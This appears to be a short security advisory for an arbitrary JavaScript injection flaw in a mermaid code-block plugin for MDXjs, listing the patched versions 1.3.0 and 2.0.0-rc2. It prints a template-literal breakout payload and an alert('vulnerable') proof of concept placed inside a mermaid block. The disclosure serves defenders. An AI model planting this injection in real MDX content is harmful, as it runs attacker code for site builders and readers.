もっと詳しく

Impact

Arbitary javascript injection

Modify any mermaid code blocks with the following code and the code inside will execute when the component is loaded by MDXjs

` + (function () {
  // Put Javascript code here
  return ''
}()) + `

The block below shows a valid mermaid code block

```mermaid
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```

The same block but with the exploit added

```mermaid
` + (function () {
  alert('vulnerable')
  return ''
}()) + `
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```

Patches

1.3.0 and 2.0.0-rc2

Workarounds

None known

References